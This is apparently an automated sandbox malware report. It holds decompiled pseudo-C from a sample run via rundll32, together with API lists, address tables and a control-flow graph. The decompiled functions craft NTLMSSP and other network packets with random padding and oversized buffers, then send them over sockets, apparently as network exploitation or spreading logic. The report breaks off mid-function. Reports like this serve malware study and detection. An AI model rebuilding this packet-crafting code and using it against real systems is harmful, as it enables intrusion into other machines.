                                                                                                                                                  				_v48 = _a20;
                                                                                                                                                  				_t212 = HeapAlloc(GetProcessHeap(), 8, 0x10);
                                                                                                                                                  				_v32 = _t212;
                                                                                                                                                  				if(_t212 == 0) {
                                                                                                                                                  					L49:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                                                                  					goto L50;
                                                                                                                                                  				}
                                                                                                                                                  				 *_t212 = _v44;
                                                                                                                                                  				 *((intOrPtr*)(_t212 + 4)) = _v40;
                                                                                                                                                  				_t215 = _t212 + 8;
                                                                                                                                                  				_v40 = _t215;
                                                                                                                                                  				_a12 = _t215;
                                                                                                                                                  				_v20 = 8;
                                                                                                                                                  				do {
                                                                                                                                                  					_t216 = rand();
                                                                                                                                                  					_a12 = _a12 + 1;
                                                                                                                                                  					_t70 =  &_v20;
                                                                                                                                                  					 *_t70 = _v20 - 1;
                                                                                                                                                  					 *_a12 = _t216;
                                                                                                                                                  				} while ( *_t70 != 0);
                                                                                                                                                  				_t218 = E047715A7(_v32, 0x10, _a20,  &_a20, 0x8003); // executed
                                                                                                                                                  				if(_t218 == 0) {
                                                                                                                                                  					_t222 = HeapAlloc(GetProcessHeap(), 8, 0x18);
                                                                                                                                                  					_v20 = _t222;
                                                                                                                                                  					if(_t222 != 0) {
                                                                                                                                                  						_t282 = _v40;
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						 *((intOrPtr*)(_t222 + 0x10)) =  *_t282;
                                                                                                                                                  						 *((intOrPtr*)(_t222 + 0x14)) =  *((intOrPtr*)(_t282 + 4));
                                                                                                                                                  						if(0 == _v12) {
                                                                                                                                                  							 *_t222 = 0x55004e;
                                                                                                                                                  							 *((intOrPtr*)(_t222 + 4)) = 0x4c004c;
                                                                                                                                                  						}
                                                                                                                                                  						_a12 = (_v12 & 0x0000ffff) + (_v12 & 0x0000ffff) + 0xa4;
                                                                                                                                                  						if(0 == _v12) {
                                                                                                                                                  							_a12 = _a12 - 0x10;
                                                                                                                                                  						}
                                                                                                                                                  						_t264 = HeapAlloc(GetProcessHeap(), 8, _a12);
                                                                                                                                                  						if(_t264 != 0) {
                                                                                                                                                  							_t285 = 9;
                                                                                                                                                  							_t235 = memcpy(_t264,  *_a8, _t285 << 2);
                                                                                                                                                  							_t330 = _t329 + 0xc;
                                                                                                                                                  							__imp__#9(_a12 + 0xfffffffc);
                                                                                                                                                  							_t325 = _v12;
                                                                                                                                                  							 *(_t264 + 2) = _t235;
                                                                                                                                                  							 *((short*)(_t264 + 0x29)) = 0x1104;
                                                                                                                                                  							_t237 = 2;
                                                                                                                                                  							 *((short*)(_t264 + 0x2b)) = _t237;
                                                                                                                                                  							 *((short*)(_t264 + 0x2d)) = 1;
                                                                                                                                                  							_t240 = _t325 + _t325 + 0x60;
                                                                                                                                                  							 *((char*)(_t264 + 8)) = 0x73;
                                                                                                                                                  							 *((short*)(_t264 + 0x24)) = 0xff0c;
                                                                                                                                                  							 *((short*)(_t264 + 0x33)) = _t240;
                                                                                                                                                  							if(0 == _t325) {
                                                                                                                                                  								 *((short*)(_t264 + 0x33)) = _t240 + 0xfffffff0;
                                                                                                                                                  							}
                                                                                                                                                  							 *((short*)(_t264 + 0x3d)) =  *((intOrPtr*)(_t264 + 0x33)) + 5;
                                                                                                                                                  							_t244 =  *((intOrPtr*)(_t264 + 0x33)) - 2;
                                                                                                                                                  							 *((char*)(_t264 + 0x40)) = _t244;
                                                                                                                                                  							_t245 = _t244 - 2;
                                                                                                                                                  							 *((char*)(_t264 + 0x42)) = _t245;
                                                                                                                                                  							_t246 = _t245 - 2;
                                                                                                                                                  							 *((char*)(_t264 + 0x44)) = _t246;
                                                                                                                                                  							 *((char*)(_t264 + 0x46)) = _t246 - 2;
                                                                                                                                                  							 *((intOrPtr*)(_t264 + 0x39)) = 0x8000c044;
                                                                                                                                                  							 *((char*)(_t264 + 0x3f)) = 0xa1;
                                                                                                                                                  							 *((char*)(_t264 + 0x41)) = 0x30;
                                                                                                                                                  							 *((char*)(_t264 + 0x43)) = 0xa2;
                                                                                                                                                  							 *((char*)(_t264 + 0x45)) = 4;
                                                                                                                                                  							 *((intOrPtr*)(_t264 + 0x47)) = 0x4d4c544e;
                                                                                                                                                  							 *((intOrPtr*)(_t264 + 0x4b)) = 0x505353;
                                                                                                                                                  							 *((intOrPtr*)(_t264 + 0x4f)) = 3;
                                                                                                                                                  							if(0 == _t325) {
                                                                                                                                                  								_t288 = 0x48;
                                                                                                                                                  								_push(0x40);
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x67)) = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x6f)) = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x77)) = 0;
                                                                                                                                                  								_t250 = 8;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x57)) = _t288;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x5f)) = _t288;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x7f)) = _t288;
                                                                                                                                                  								 *((short*)(_t264 + 0x73)) = _t250;
                                                                                                                                                  								 *((short*)(_t264 + 0x75)) = _t250;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t258 = 0x18;
                                                                                                                                                  								 *((short*)(_t264 + 0x53)) = _t258;
                                                                                                                                                  								 *((short*)(_t264 + 0x55)) = _t258;
                                                                                                                                                  								_t302 = 0x68;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x57)) = (_t325 & 0x0000ffff) + (_t325 & 0x0000ffff) + 0x40;
                                                                                                                                                  								_t261 = 0x40;
                                                                                                                                                  								_t292 = _t325 + _t325;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x5f)) = _t302;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x67)) = _t261;
                                                                                                                                                  								 *((short*)(_t264 + 0x6b)) = _t292;
                                                                                                                                                  								 *((short*)(_t264 + 0x6d)) = _t292;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x6f)) = _t261;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x77)) = 0x50;
                                                                                                                                                  								 *((intOrPtr*)(_t264 + 0x7f)) = _t302;
                                                                                                                                                  							}
                                                                                                                                                  							_t142 = _t264 + 0x87; // 0x87
                                                                                                                                                  							_t315 = _t142;
                                                                                                                                                  							 *((intOrPtr*)(_t264 + 0x83)) = 0xa0880205;
                                                                                                                                                  							memcpy(_t315, _a16, _v16);
                                                                                                                                                  							_t331 = _t330 + 0xc;
                                                                                                                                                  							if(0 != _t325) {
                                                                                                                                                  								_t289 = 6;
                                                                                                                                                  								_t253 = memcpy(_t315 + _v16, _v20, _t289 << 2);
                                                                                                                                                  								_t331 = _t331 + 0xc;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t257 = _v20;
                                                                                                                                                  								 *_t315 =  *_t257;
                                                                                                                                                  								_t253 =  *(_t257 + 4);
                                                                                                                                                  								 *(_t315 + 4) = _t253;
                                                                                                                                                  							}
                                                                                                                                                  							__imp__#19(_a4, _t264, _a12, 0); // executed
                                                                                                                                                  							if(_t253 > 0) {
                                                                                                                                                  								_t319 = _a24;
                                                                                                                                                  								__imp__#16(_a4, _t319, 0xffff, 0); // executed
                                                                                                                                                  								if(_t253 > 0) {
                                                                                                                                                  									if( *((intOrPtr*)(_t319 + 9)) == 0) {
                                                                                                                                                  										_v5 = 1;
                                                                                                                                                  									}
                                                                                                                                                  									memset(_t319, 0, 0xffff);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							HeapFree(GetProcessHeap(), 8, _t264);
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                                                                  						_t322 = _v28;
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v48);
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _v32);
                                                                                                                                                  				goto L49;
                                                                                                                                                  			}









































































                                                                                                                                                  0x0477174d
                                                                                                                                                  0x04771753
                                                                                                                                                  0x04771757
                                                                                                                                                  0x0477175a
                                                                                                                                                  0x0477175a
                                                                                                                                                  0x0477175d
                                                                                                                                                  0x04771760
                                                                                                                                                  0x0477176f
                                                                                                                                                  0x04771772
                                                                                                                                                  0x04771778
                                                                                                                                                  0x0477177a
                                                                                                                                                  0x0477178e
                                                                                                                                                  0x04771790
                                                                                                                                                  0x04771795
                                                                                                                                                  0x04771c30
                                                                                                                                                  0x04771c37
                                                                                                                                                  0x04771c37
                                                                                                                                                  0x0477179b
                                                                                                                                                  0x047717a0
                                                                                                                                                  0x047717a2
                                                                                                                                                  0x047717a2
                                                                                                                                                  0x047717a5
                                                                                                                                                  0x047717a9
                                                                                                                                                  0x047717ac
                                                                                                                                                  0x047717b2
                                                                                                                                                  0x047717b8
                                                                                                                                                  0x047717bb
                                                                                                                                                  0x047717be
                                                                                                                                                  0x047717be
                                                                                                                                                  0x047717c1
                                                                                                                                                  0x047717c4
                                                                                                                                                  0x047717d7
                                                                                                                                                  0x047717df
                                                                                                                                                  0x047717e1
                                                                                                                                                  0x047717e6
                                                                                                                                                  0x04771c22
                                                                                                                                                  0x04771c2a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771c2a
                                                                                                                                                  0x047717ef
                                                                                                                                                  0x047717f3
                                                                                                                                                  0x047717f6
                                                                                                                                                  0x047717ff
                                                                                                                                                  0x047717ff
                                                                                                                                                  0x04771801
                                                                                                                                                  0x04771807
                                                                                                                                                  0x0477180a
                                                                                                                                                  0x04771815
                                                                                                                                                  0x04771819
                                                                                                                                                  0x0477181a
                                                                                                                                                  0x04771823
                                                                                                                                                  0x04771824
                                                                                                                                                  0x0477182a
                                                                                                                                                  0x04771830
                                                                                                                                                  0x04771831
                                                                                                                                                  0x04771835
                                                                                                                                                  0x04771839
                                                                                                                                                  0x0477183f
                                                                                                                                                  0x04771846
                                                                                                                                                  0x0477184b
                                                                                                                                                  0x0477184e
                                                                                                                                                  0x04771850
                                                                                                                                                  0x04771852
                                                                                                                                                  0x04771853
                                                                                                                                                  0x04771855
                                                                                                                                                  0x04771856
                                                                                                                                                  0x04771856
                                                                                                                                                  0x04771863
                                                                                                                                                  0x0477186b
                                                                                                                                                  0x04771c16
                                                                                                                                                  0x04771c1c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771c1c
                                                                                                                                                  0x04771871
                                                                                                                                                  0x0477187f
                                                                                                                                                  0x0477188a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477189c
                                                                                                                                                  0x047718a5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047718ad
                                                                                                                                                  0x047718ae
                                                                                                                                                  0x047718b5
                                                                                                                                                  0x047718c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047718ce
                                                                                                                                                  0x047718d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047718d4
                                                                                                                                                  0x047718dd
                                                                                                                                                  0x047718e8
                                                                                                                                                  0x047718f2
                                                                                                                                                  0x047718fd
                                                                                                                                                  0x047718ff
                                                                                                                                                  0x04771904
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477191f
                                                                                                                                                  0x04771926
                                                                                                                                                  0x04771c08
                                                                                                                                                  0x04771c10
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771c10
                                                                                                                                                  0x0477192c
                                                                                                                                                  0x04771941
                                                                                                                                                  0x04771948
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771955
                                                                                                                                                  0x0477195b
                                                                                                                                                  0x0477195d
                                                                                                                                                  0x04771962
                                                                                                                                                  0x04771bfa
                                                                                                                                                  0x04771c02
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771c02
                                                                                                                                                  0x0477196b
                                                                                                                                                  0x04771970
                                                                                                                                                  0x04771973
                                                                                                                                                  0x04771976
                                                                                                                                                  0x04771979
                                                                                                                                                  0x0477197c
                                                                                                                                                  0x04771983
                                                                                                                                                  0x04771983
                                                                                                                                                  0x0477198c
                                                                                                                                                  0x0477198f
                                                                                                                                                  0x0477198f
                                                                                                                                                  0x04771992
                                                                                                                                                  0x04771992
                                                                                                                                                  0x047719a7
                                                                                                                                                  0x047719ae
                                                                                                                                                  0x047719bb
                                                                                                                                                  0x047719bd
                                                                                                                                                  0x047719c2
                                                                                                                                                  0x047719cb
                                                                                                                                                  0x047719d0
                                                                                                                                                  0x047719d1
                                                                                                                                                  0x047719d2
                                                                                                                                                  0x047719d3
                                                                                                                                                  0x047719d6
                                                                                                                                                  0x047719dc
                                                                                                                                                  0x047719e5
                                                                                                                                                  0x047719e7
                                                                                                                                                  0x047719ed
                                                                                                                                                  0x047719ed
                                                                                                                                                  0x047719ff
                                                                                                                                                  0x04771a08
                                                                                                                                                  0x04771a0a
                                                                                                                                                  0x04771a0a
                                                                                                                                                  0x04771a1c
                                                                                                                                                  0x04771a20
                                                                                                                                                  0x04771a30
                                                                                                                                                  0x04771a37
                                                                                                                                                  0x04771a37
                                                                                                                                                  0x04771a39
                                                                                                                                                  0x04771a3f
                                                                                                                                                  0x04771a42
                                                                                                                                                  0x04771a4b
                                                                                                                                                  0x04771a51
                                                                                                                                                  0x04771a52
                                                                                                                                                  0x04771a59
                                                                                                                                                  0x04771a5f
                                                                                                                                                  0x04771a63
                                                                                                                                                  0x04771a67
                                                                                                                                                  0x04771a6d
                                                                                                                                                  0x04771a74
                                                                                                                                                  0x04771a79
                                                                                                                                                  0x04771a79
                                                                                                                                                  0x04771a85
                                                                                                                                                  0x04771a8c
                                                                                                                                                  0x04771a8e
                                                                                                                                                  0x04771a91
                                                                                                                                                  0x04771a93
                                                                                                                                                  0x04771a96
                                                                                                                                                  0x04771a98
                                                                                                                                                  0x04771a9d
                                                                                                                                                  0x04771aa2
                                                                                                                                                  0x04771aa9
                                                                                                                                                  0x04771aad
                                                                                                                                                  0x04771ab1
                                                                                                                                                  0x04771ab5
                                                                                                                                                  0x04771ab9
                                                                                                                                                  0x04771ac0
                                                                                                                                                  0x04771ac7
                                                                                                                                                  0x04771ad1
                                                                                                                                                  0x04771b10
                                                                                                                                                  0x04771b11
                                                                                                                                                  0x04771b16
                                                                                                                                                  0x04771b19
                                                                                                                                                  0x04771b1c
                                                                                                                                                  0x04771b1f
                                                                                                                                                  0x04771b20
                                                                                                                                                  0x04771b23
                                                                                                                                                  0x04771b26
                                                                                                                                                  0x04771b29
                                                                                                                                                  0x04771b2d
                                                                                                                                                  0x04771ad3
                                                                                                                                                  0x04771ad5
                                                                                                                                                  0x04771ad6
                                                                                                                                                  0x04771ada
                                                                                                                                                  0x04771ae3
                                                                                                                                                  0x04771aea
                                                                                                                                                  0x04771aed
                                                                                                                                                  0x04771aee
                                                                                                                                                  0x04771af1
                                                                                                                                                  0x04771af4
                                                                                                                                                  0x04771af7
                                                                                                                                                  0x04771afb
                                                                                                                                                  0x04771aff
                                                                                                                                                  0x04771b02
                                                                                                                                                  0x04771b09
                                                                                                                                                  0x04771b09
                                                                                                                                                  0x04771b34
                                                                                                                                                  0x04771b34
                                                                                                                                                  0x04771b3d
                                                                                                                                                  0x04771b48
                                                                                                                                                  0x04771b4f
                                                                                                                                                  0x04771b55
                                                                                                                                                  0x04771b6e
                                                                                                                                                  0x04771b6f
                                                                                                                                                  0x04771b6f
                                                                                                                                                  0x04771b57
                                                                                                                                                  0x04771b57
                                                                                                                                                  0x04771b5c
                                                                                                                                                  0x04771b5e
                                                                                                                                                  0x04771b61
                                                                                                                                                  0x04771b61
                                                                                                                                                  0x04771b7a
                                                                                                                                                  0x04771b82
                                                                                                                                                  0x04771b84
                                                                                                                                                  0x04771b93
                                                                                                                                                  0x04771b9b
                                                                                                                                                  0x04771ba1
                                                                                                                                                  0x04771ba3
                                                                                                                                                  0x04771ba3
                                                                                                                                                  0x04771bab
                                                                                                                                                  0x04771bb0
                                                                                                                                                  0x04771b9b
                                                                                                                                                  0x04771bbd
                                                                                                                                                  0x04771bbd
                                                                                                                                                  0x04771bcf
                                                                                                                                                  0x04771bdb
                                                                                                                                                  0x04771bdb
                                                                                                                                                  0x04771be6
                                                                                                                                                  0x04771be6
                                                                                                                                                  0x04771bf4
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04771C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04771783
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477178C
                                                                                                                                                  • CharUpperW.USER32(00000000), ref: 047717B2
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000086), ref: 047717DA
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047717DD
                                                                                                                                                  • htons.WS2_32(00000082), ref: 04771801
                                                                                                                                                  • send.WS2_32(00000086,?,00000086,00000041), ref: 04771863
                                                                                                                                                  • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 0477187F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000018), ref: 047718F4
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047718FD
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04771958
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477195B
                                                                                                                                                  • rand.MSVCRT ref: 04771983
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 047719B8
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047719BB
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04771A13
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04771A16
                                                                                                                                                  • htons.WS2_32(-000000FC), ref: 04771A39
                                                                                                                                                  • memcpy.MSVCRT ref: 04771B48
                                                                                                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 04771B7A
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04771B93
                                                                                                                                                  • memset.MSVCRT ref: 04771BAB
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04771BB6
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771BBD
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04771BC8
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771BCF
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04771BE3
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771BE6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04771BF1
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771BF4
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04771BFF
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771C02
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04771C0D
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771C10
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04771C19
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771C1C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04771C27
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04771C2A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                                                                                                                                  • String ID: NTLM$SSP
                                                                                                                                                  • API String ID: 2370844593-3976291102
                                                                                                                                                  • Opcode ID: b0d34ce1462a21e30441bf3eea37a9323b4bf6022c1856f46c0b920d8baae4c3
                                                                                                                                                  • Instruction ID: be0e40ec5478dce4dd40c4e1ff4cd4e2aa16e198f52e7f3051b844708a9eb12f
                                                                                                                                                  • Opcode Fuzzy Hash: b0d34ce1462a21e30441bf3eea37a9323b4bf6022c1856f46c0b920d8baae4c3
                                                                                                                                                  • Instruction Fuzzy Hash: 01F18E75A003059FEF24DFA4C885BAA7BB5FF48300F848499EA45EB391E775E805CB54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 109 4772497-47724bf GetProcessHeap HeapAlloc 110 47724c5-47724d6 GetProcessHeap HeapAlloc 109->110 111 47726ff-4772705 109->111 112 47726ec-47726fe GetProcessHeap HeapFree 110->112 113 47724dc-477255d rand htons 110->113 112->111 114 477256f-477258a GetProcessHeap HeapAlloc 113->114 115 477255f-477256d rand 113->115 116 4772590-47725cb htons 114->116 117 47726dc-47726e6 GetProcessHeap HeapFree 114->117 115->114 115->115 118 47725cd-47725db rand 116->118 117->112 118->118 119 47725dd-47725f8 GetProcessHeap HeapAlloc 118->119 120 47725fe-4772634 memcpy * 2 send 119->120 121 47726cc-47726d6 GetProcessHeap HeapFree 119->121 122 47726ba-47726c6 GetProcessHeap HeapFree 120->122 123 477263a-4772651 send 120->123 121->117 122->121 123->122 124 4772653-4772667 123->124 125 4772694-477269b recv 124->125 126 477269d 125->126 127 4772669-4772677 125->127 126->122 127->122 128 4772679-4772680 127->128 128->122 129 4772682-4772688 128->129 130 477269f-47726a3 129->130 131 477268a-4772693 129->131 132 47726b6 130->132 133 47726a5-47726b4 call 4772344 130->133 131->125 132->122 133->122
                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E04772497(void* __ecx, intOrPtr _a4, void** _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				signed int _t71;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  				short _t75;
                                                                                                                                                  				void* _t84;
                                                                                                                                                  				void* _t95;
                                                                                                                                                  				void* _t100;
                                                                                                                                                  				void* _t101;
                                                                                                                                                  				void* _t105;
                                                                                                                                                  				signed int _t108;
                                                                                                                                                  				signed int _t109;
                                                                                                                                                  				intOrPtr _t111;
                                                                                                                                                  				signed int _t112;
                                                                                                                                                  				signed int _t115;
                                                                                                                                                  				void* _t120;
                                                                                                                                                  				void** _t124;
                                                                                                                                                  				void* _t128;
                                                                                                                                                  				void* _t131;
                                                                                                                                                  				void* _t137;
                                                                                                                                                  				void* _t139;
                                                                                                                                                  				void* _t140;
                                                                                                                                                  				intOrPtr* _t141;
                                                                                                                                                  				intOrPtr* _t142;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t65 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v12 = _t65;
                                                                                                                                                  				if(_t65 == 0) {
                                                                                                                                                  					L24:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t105 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                                                                  				if(_t105 == 0) {
                                                                                                                                                  					L23:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  					goto L24;
                                                                                                                                                  				}
                                                                                                                                                  				_t124 = _a8;
                                                                                                                                                  				_t71 = rand();
                                                                                                                                                  				_t108 = 0x14;
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t109 = 9;
                                                                                                                                                  				 *((intOrPtr*)( *_t124 + 0x22)) =  *((intOrPtr*)( *_t124 + 0x22)) + _t71 % _t108;
                                                                                                                                                  				_t73 = memcpy(_t105,  *_t124, _t109 << 2);
                                                                                                                                                  				__imp__#9(0x1120);
                                                                                                                                                  				 *(_t105 + 2) = _t73;
                                                                                                                                                  				_t111 = 4;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x40)) = 0x10d0;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x2c)) = 0x10d0;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x34)) = 0x10d0;
                                                                                                                                                  				_t75 = 5;
                                                                                                                                                  				 *((short*)(_t105 + 0x49)) = _t75;
                                                                                                                                                  				 *((short*)(_t105 + 0x4b)) =  *((intOrPtr*)(_t105 + 0x40)) + 7;
                                                                                                                                                  				 *((char*)(_t105 + 8)) = 0xa0;
                                                                                                                                                  				 *((char*)(_t105 + 0x24)) = 0x13;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x28)) = 0;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x30)) = 0x3f3c;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x38)) = _t111;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x3c)) = 0x4c;
                                                                                                                                                  				 *((intOrPtr*)(_t105 + 0x44)) = 0x50;
                                                                                                                                                  				_t137 = 0;
                                                                                                                                                  				 *((short*)(_t105 + 0x50)) = _a12;
                                                                                                                                                  				if( *((intOrPtr*)(_t105 + 0x40)) <= 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t128 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                                                                  					_a12 = _t128;
                                                                                                                                                  					if(_t128 == 0) {
                                                                                                                                                  						L22:
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t105);
                                                                                                                                                  						goto L23;
                                                                                                                                                  					}
                                                                                                                                                  					_t112 = 9;
                                                                                                                                                  					_t84 = memcpy(_t128,  *_a8, _t112 << 2);
                                                                                                                                                  					__imp__#9(0x15c);
                                                                                                                                                  					_t131 = _a12;
                                                                                                                                                  					 *(_t131 + 2) = _t84;
                                                                                                                                                  					 *((intOrPtr*)(_t131 + 0x2c)) = 0x114;
                                                                                                                                                  					 *((intOrPtr*)(_t131 + 0x3c)) = 0x114;
                                                                                                                                                  					 *((char*)(_t131 + 8)) = 0xa1;
                                                                                                                                                  					 *((char*)(_t131 + 0x24)) = 0x12;
                                                                                                                                                  					 *((intOrPtr*)(_t131 + 0x40)) = 0x48;
                                                                                                                                                  					 *((short*)(_t131 + 0x49)) = 0x115;
                                                                                                                                                  					_t139 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						 *((char*)(_t131 + _t139 + 0x4c)) = rand();
                                                                                                                                                  						_t139 = _t139 + 1;
                                                                                                                                                  					} while (_t139 <  *((intOrPtr*)(_t131 + 0x3c)));
                                                                                                                                                  					_t140 = HeapAlloc(GetProcessHeap(), 8, 0x1284);
                                                                                                                                                  					_a8 = _t140;
                                                                                                                                                  					if(_t140 == 0) {
                                                                                                                                                  						L21:
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t131);
                                                                                                                                                  						goto L22;
                                                                                                                                                  					}
                                                                                                                                                  					memcpy(_t140, _t105, 0x1124);
                                                                                                                                                  					_t46 = _t140 + 0x1124; // 0x1124
                                                                                                                                                  					memcpy(_t46, _t131, 0x160);
                                                                                                                                                  					_t141 = __imp__#19; // executed
                                                                                                                                                  					_t95 =  *_t141(_a4, _t140, 0x111c, 0); // executed
                                                                                                                                                  					if(_t95 <= 0) {
                                                                                                                                                  						L20:
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                                                                  						goto L21;
                                                                                                                                                  					}
                                                                                                                                                  					_t100 =  *_t141(_a4, _a8 + 0x111c, 0x168, 0); // executed
                                                                                                                                                  					if(_t100 <= 0) {
                                                                                                                                                  						goto L20;
                                                                                                                                                  					}
                                                                                                                                                  					_a12 = _a12 & 0x00000000;
                                                                                                                                                  					_t142 = __imp__#16;
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(0xffff);
                                                                                                                                                  					_push(_v12);
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t101 =  *_t142(_a4); // executed
                                                                                                                                                  						if(_t101 <= 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t115 = _a12 + _t101;
                                                                                                                                                  						_a12 = _t115;
                                                                                                                                                  						if(_t115 == 0x1193) {
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  						_t120 = _v12;
                                                                                                                                                  						if( *((intOrPtr*)(_t120 + 9)) != 0) {
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t115 >= 0x1280) {
                                                                                                                                                  							if(_t101 < 0x1c) {
